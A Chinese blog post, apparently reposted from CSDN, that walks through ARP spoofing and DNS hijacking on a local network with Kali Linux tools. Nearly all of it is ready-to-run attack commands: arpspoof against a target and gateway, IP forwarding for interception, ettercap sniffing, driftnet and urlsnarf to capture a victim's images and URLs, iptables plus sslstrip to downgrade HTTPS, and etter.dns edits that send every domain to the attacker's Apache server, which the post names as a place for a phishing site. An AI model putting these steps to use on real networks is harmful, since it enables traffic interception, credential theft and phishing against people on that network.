ARP欺骗&DNS劫持

                                                                                 ARP欺骗

ARP:(Address Resolution Protocol,地址解析协议)是一个位于TCP/IP协议栈中的网络层,负责将某个IP地址解析成对应的MAC地址.以太网(局域网)进行信息传输时,不是根据IP地址进行通信,因为IP地址是可变的,用于通信不安全。然而MAC地址是网卡的硬件地址,一般出厂后就具有唯一性。ARP协议就是将目标IP地址解析成MAC地址进行验证通信。
ping ip //ping主机是否连通
fping -aqg ip/掩码      nmap -sP 192.168.0.1/2     //获得主机列表,192.168.0.1/24”表示扫描"192.168.0.1-192.168.0.254"这个网段内所有的主机。
route -n //查看网关
ifconfig //查看网卡接口
arpspoof -i eth0 -t 192.168.0.129 -r 192.168.0.2 //断网攻击,arp欺骗 -i 表示网卡接口,-t 表示目标地址,-r 表示网关。默认是不转发的,执行这条命令目标主机就无法联网了
arp -a //查看网络目标主机对应的物理地址,看是否被欺骗,如果 ARP 欺骗成功则被攻击的主机会把数据先传到我们主机
echo 1 > /proc/sys/net/ipv4/ip_forward    //流量劫持,将1写入这个文件就可以流量劫持,同时目标机就能联网了。ARP欺骗目的是把自己伪装成网关,但如果不作处理当被欺骗数据包到达后就会被本机丢弃(因为本机不是网关,不知道如何处理这类数据包),开启IP转发功能负责把该类数据包再转发给真正的网关处理
ettercap -Tq -i eth0     //抓取http流量
driftnet -i eth0 //查看截获目标ip的图片
urlsnarf -i eth0 //查看截获目标ip的url
vim /etc/ettercap/etter.conf  //将后面两行的#去掉 #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080       //修改ip转发表,将 80端口流量转发到 8080端口(因为sslstrip监听8080端口)
sslstrip -a -f -k  //https转换成http
iptables -t nat -L  //查看 ip 转发表
iptables -t nat -D PREROUTING 1   //攻击完成后删除这条记录命令
sslstrip -l 8080  //slstrip监听的8080端口
ettercap -i eth0 -T -M arp:remote /192.168.0.129// /192.168.0.2//      //流量监控,登陆某网站再查看 Ettercap可查看信息数据

................................................................................................................................................................................................................................................................................

                                                                                      DNS劫持

DNS:Domain Name System的缩写,它本身的实质上一个域名和ip的数据库服务器,功能是帮我们把输入的域名转换成ip地址,之后通过ip寻址连接目标服务器
DNS劫持:简单说是把目标网站域名解析到错误的IP地址从而实现用户无法访问目标网站或者恶意要求用户访问指定IP服务网站的目的
ifconfig //记录ip
vim /etc/ettercap/etter.dns  文件内添加*    A    自己ip   ||   *    PTR    自己ip    //* 代表任何网站,A记录,PTR记录
service apache2 start //     启动内部apache服务器,内部可以是钓鱼网站或者app分发地址
ettercap -G     //打开ettercap,选择网卡,扫描局域网在线主机,勾选远程嗅探连接选项,勾选DNS欺骗选项,点击stat按钮,此时目标主机就连接不了互联网了只能连接访问  kali中apache服务器内网站
ping baidu.com      //可以看到ping的域名对应的ip是kali本身的ip
nslookup baidu.com      //命令用于查询DNS的记录,查看域名解析是否正常
ipconfig /displaydns    ipconfig /flushdns   // Windows下查看和刷清空DNS缓存表的命令

 

猜你喜欢

转载自blog.csdn.net/weixin_44212888/article/details/113610386